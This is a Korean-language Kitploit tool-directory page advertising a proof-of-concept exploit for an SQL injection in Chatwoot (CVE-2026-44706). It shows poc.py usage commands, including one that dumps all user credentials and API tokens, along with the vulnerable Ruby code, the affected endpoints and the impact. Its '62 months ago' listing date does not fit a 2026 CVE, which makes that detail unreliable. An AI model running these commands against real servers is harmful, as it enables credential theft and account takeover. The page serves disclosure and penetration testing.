Skip to content
KitploitKITPLOIT
도구블로그
제출
도구블로그
제출

해킹, 침투 테스트 및 사이버 보안 도구를 당신의 보안 무기고에!

Kitploit은 해킹, 사이버 보안 및 침투 테스트 도구 디렉토리입니다. 최신 프로젝트 업데이트를 발견하여 취약점을 찾고, 시스템을 분석하고, 테스트를 자동화하고, 보안을 강화하세요.

··피드·문의·개인정보·© 2026 Kitploit

도구 디렉토리

카테고리

모든 카테고리 보기
Loading categories
CVE-2026-44706 — Chatwoot FilterService의 SQL 인젝션 | Kitploit
도구/GitHubGitHub/hakaioffsec/cve-2026-44706
Vulnerability AnalysisExploitationWeb Application ExploitationPenetration TestingAuthenticationLearning & EducationDatabase Security
GitHubhakaioffsec/cve-2026-44706

CVE-2026-44706

Chatwoot FilterService의 SQL 인젝션

저장소 보기
62개월 전아직 검토되지 않음

인기

모두 보기 →

커뮤니티에서 가장 많이 사용되는 도구를 찾아보세요.

모든 도구 탐색

도구 컬렉션을 둘러보세요

모든 도구 보기 →
공유

Chatwoot FilterService의 SQL 인젝션

CVE-2026-44706에 대한 개념 증명 익스플로잇입니다. Chatwoot의 FilterService#lt_gt_filter_values에 존재하는 SQL 인젝션 취약점으로, 인증된 모든 에이전트가 사용자 자격 증명 및 API 토큰을 포함한 전체 PostgreSQL 데이터베이스를 읽을 수 있습니다. 전체 기사는 여기에서 확인하세요.

사용법:

root@kitploit:~
# 인젝션 확인 (boolean 기반)
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode check

# 시간 기반 확인
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode timebased

# 임의 SQL 쿼리 결과 추출
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode extract --query "SELECT version()"

# 모든 사용자 자격 증명 및 API 토큰 덤프
$ python3 poc.py --url http://TARGET --token TOKEN --account-id 1 --mode creds

취약한 버전

  • Chatwoot ≤ 4.11.1

근본 원인

app/services/filter_service.rb (라인 91)에서 사용자 입력이 매개변수화 없이 SQL에 직접 삽입됩니다:

root@kitploit:~
def lt_gt_filter_values(query_hash)
  value = query_hash['values'][0]          # ← 사용자 입력, 검증 없음
  operator = query_hash['filter_operator'] == 'is_less_than' ? '<' : '>'
  "#{operator} '#{value}'::#{attribute_data_type}"   # ← 원시 삽입
end

클래스의 다른 모든 연산자는 바인드 매개변수(:value_N)를 사용합니다. is_greater_than과 is_less_than만 취약합니다.

영향을 받는 엔드포인트

  • POST /api/v1/accounts/:id/conversations/filter
  • POST /api/v1/accounts/:id/contacts/filter

영향

CWE-89 SQL 인젝션. 인증된 모든 에이전트/관리자는 다음을 수행할 수 있습니다:

  • 전체 데이터베이스 읽기: 사용자, 메시지, 토큰, 계정 간 데이터
  • 자격 증명 탈취: 오프라인 크래킹을 위한 bcrypt 해시
  • API 토큰 탈취: SuperAdmin을 포함한 모든 사용자를 가장
  • DoS: pg_sleep()을 사용하여 데이터베이스 연결을 소진

CVSS

8.8 높음 CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:H/A:H

면책 조항

이 도구는 교육 및 연구 목적으로만 사용됩니다. 소유하고 있거나 명시적 테스트 허가를 받은 시스템에서만 사용하십시오. 저자는 이 프로그램의 오용이나 손해에 대해 책임을 지지 않습니다.

QuimeraX Intelligence

QuimeraX Intelligence는 복잡한 시스템의 중요한 취약점을 식별하는 데 특화된 고급 EASM 및 사이버 위협 인텔리전스 플랫폼입니다. 이 플랫폼은 보안 위협을 사전 예방적으로 모니터링, 탐지 및 경고하여 투명성을 보장하고 잠재적 위험에 신속하게 대응합니다. 클라이언트 시스템이 취약한 것으로 확인되면 즉시 알림과 포괄적인 보고서를 받아 보호 조치를 취할 수 있습니다. 자세히 알아보기

Hakai Security

Hakai Security는 보안 전문가가 설립한 사이버 보안 회사로, 기술적 우수성에 전념합니다. 우리는 고급 침투 테스트, 현실적인 레드 팀 시뮬레이션 및 안전한 개발 관행을 포함한 맞춤형 보안 솔루션을 제공하여 진화하는 사이버 위협으로부터 고객의 자산을 사전에 보호합니다.

Hacking Club

Hacking Club은 실무 경험이 풍부한 보안 컨설팅 회사의 전문가가 만든 실습형 강의, 실습실 및 과제를 통해 사이버 보안을 배우는 교육 플랫폼입니다. 전장에서 바로 여러분의 훈련으로 이어집니다. Hacking Club에서 이 저장소에 제시된 취약점을 연습해 보세요! 자세히 알아보기

도구 다운로드